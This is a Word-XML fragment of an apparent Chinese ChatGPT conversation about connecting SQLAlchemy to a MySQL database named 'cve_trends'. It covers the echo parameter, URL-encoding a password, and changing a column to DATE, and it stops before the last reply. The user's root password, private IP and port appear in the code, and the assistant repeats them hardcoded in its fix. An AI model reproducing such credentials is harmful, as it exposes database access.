        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D44206" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的地址。如果你在本地机器上运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF5A770" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    dbname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：你想要连接的数据库名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5125438F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9DB6EB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此外，你需要确保已经安装了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> PyMySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> PyMySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库。如果你还没安装，你可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467F1369" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14188C46" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA06D7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pip install pymysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D751C6E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D075E3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器需要运行并且你的用户名和密码能正确登录你指定的数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68475BB5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14960B38" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，如果你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库不在本地机器上，那么你需要将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> localhost </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换为正确的主机名或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址。如果你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器运行在特定的端口上，你还需要在主机名或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址后面添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> :port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'mysql+pymysql://username:password@localhost:3306/dbname'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B391C5D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901FE64" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是什么意思</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C891DAB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5343ECB5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FDCAF72" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数决定了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否将执行的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句打印到标准输出。这个参数在调试和开发阶段可能会很有用，因为你可以看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成和执行的确切</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句。如果将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将打印所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0043A480" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E0A6E2F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些输出的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句可以帮助你理解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何将你的操作转换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，以及在出现问题时帮助你定位问题。然而，在生产环境中，这些输出可能会造成不必要的日志记录，所以通常建议在生产环境中将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3131D6F2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600FC9EB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">self.engine = create_engine('mysql://root:1qaz@WSX@192.168.3.203:23306/cve_trends?charset=utf-8', </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>echo=True)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这么写对不对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C22B90" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0E226F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354BBE1D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不完全正确。在创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> create_engine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库，你需要将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> charset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。此外，密码中含有特殊字符如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会导致问题，需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C92472" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0087EEF4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是修正后的语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E6A954" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FAFF8B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582A3875" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from sqlalchemy import create_engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C4CCD9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>self.engine = create_engine('mysql+pymysql://root:1qaz%40WSX@192.168.3.203:23306/cve_trends?charset=utf8mb4', echo=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F393B3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6975FEF6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，我用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql+pymysql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来指定使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> PyMySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为数据库连接库，将密码中的特殊字符进行了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">@ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），并将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> charset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC30166" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A19A4AF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器接受远程连接，且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户有权限连接数据库并对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cve_trends </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库进行操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CFA683" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D33E0BB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分代码是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__tablename__ = 'expdb'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A414A6B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D08E3E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    id = Column(Integer, primary_key=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CED89CF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    eid = Column(Integer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCCA743" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    cve = Column(String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59397FBE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE68407" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    title = Column(String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F63B883" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    author = Column(String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA6DBB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    published_time = Column(String)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我想把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">published_time </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1840673E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
